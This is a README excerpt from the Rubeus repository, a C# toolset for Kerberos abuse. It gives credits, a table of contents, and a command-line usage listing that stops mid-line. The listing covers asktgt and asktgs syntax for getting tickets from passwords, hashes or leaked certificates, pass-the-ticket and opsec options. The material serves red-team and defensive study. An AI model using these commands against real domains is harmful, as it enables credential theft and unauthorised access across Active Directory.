GhostPack / Rubeus
Trying to tame the three-headed dog.
Repository Overview (README excerpt)
Rubeus
----

Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is **heavily** adapted from Benjamin Delpy's Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization - without their prior work this project would not exist.

Charlie Clark and Ceri Coburn have both made _significant_ contributions as co-developers to the Rubeus codebase. Elad Shamir contributed some essential work for resource-based constrained delegation. Their work is very appreciated!

Rubeus also uses a C# ASN.1 parsing/encoding library from Thomas Pornin named DDer that was released with an "MIT-like" license. Huge thanks to Thomas for his clean and stable code!

PKINIT code heavily adapted from @SteveSyfuhs's Bruce tool. Bruce made RFC4556 (PKINIT) a lot easier to understand. Huge thanks to Steve!

NDR encoding and decoding for Kerberos PAC is based on the NtApiDotNet library from @tiraniddo, thank you James.

The KerberosRequestorSecurityToken.GetRequest method for Kerberoasting was contributed to PowerView (and then incorporated into Rubeus) by @machosec.

@harmj0y is the primary author of this code base.

Rubeus is licensed under the BSD 3-Clause license.
Table of Contents

- Rubeus
- Table of Contents
- Background
- Command Line Usage
- Opsec Notes
- Overview
- Weaponization
- Example: Credential Extraction
- Example: Over-pass-the-hash
- Ticket requests and renewals
- asktgt
- asktgs
- renew
- brute|spray
- Constrained delegation abuse
- s4u
- Ticket Forgery
- golden
- silver
- diamond
- Ticket Management
- ptt
- purge
- describe
- Ticket Extraction and Harvesting
- triage
- klist
- dump
- tgtdeleg
- monitor
- harvest
- Roasting
- kerberoast
- kerberoasting opsec
- Examples
- asreproast
- Miscellaneous
- createnetonly
- changepw
- hash
- tgssub
- currentluid
- logonsession
- asrep2kirbi
- kirbi
- Compile Instructions
- Targeting other .NET versions
- Sidenote: Building Rubeus as a Library
- Sidenote: Running Rubeus Through PowerShell
- Sidenote Sidenote: Running Rubeus Over PSRemoting

Background

Command Line Usage

```
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

 Ticket requests and renewals:

    Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID:
        Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    Retrieve a TGT based on a user password/hash, start a /netonly process, and to apply the ticket to the new process/logon session:
        Rubeus.exe asktgt /user:USER /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    Retrieve a TGT using a PCKS12 certificate, start a /netonly process, and to apply the ticket to the new process/logon session:
        Rubeus.exe asktgt /user:USER /certificate:C:\temp\leaked.pfx /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    Retrieve a TGT using a certificate from the users keystore (Smartcard) specifying certificate thumbprint or subject, start a /netonly process, and to apply the ticket to the new process/logon session:
        Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/suppenctype:DES|RC4|AES128|AES256] [/nowrap]

    Retrieve a TGT suitable for changing an account with an expired password using the changepw command
        Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/proxyurl:https://KDC_PROXY/kdcproxy]

    Request a TGT without sending pre-auth data:
        Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    Request a service ticket using an AS-REQ:
        Rubeus.exe asktgt /user:USER /service:SPN [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    Retrieve a service ticket for one or more SPNs, optionally saving or applying the ticket:
        Rubeus.exe asktgs [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]

    Retrieve a service ticket using the Kerberos Key List Request options:
        Rubeus.exe asktgs /keyList /service:KRBTGT_SPN [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]

    Retrieve a delegated managed service account ticket:
        Rubeus.exe asktgs /dmsa /opsec /service:KRBTGT_SPN /targetuser:DMSA_ACCOUNT$ [/dc:DOMAIN_CONTROLLER_Win2025] [/outfile:FILENAME] [/ptt] [/nowrap] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKE…
```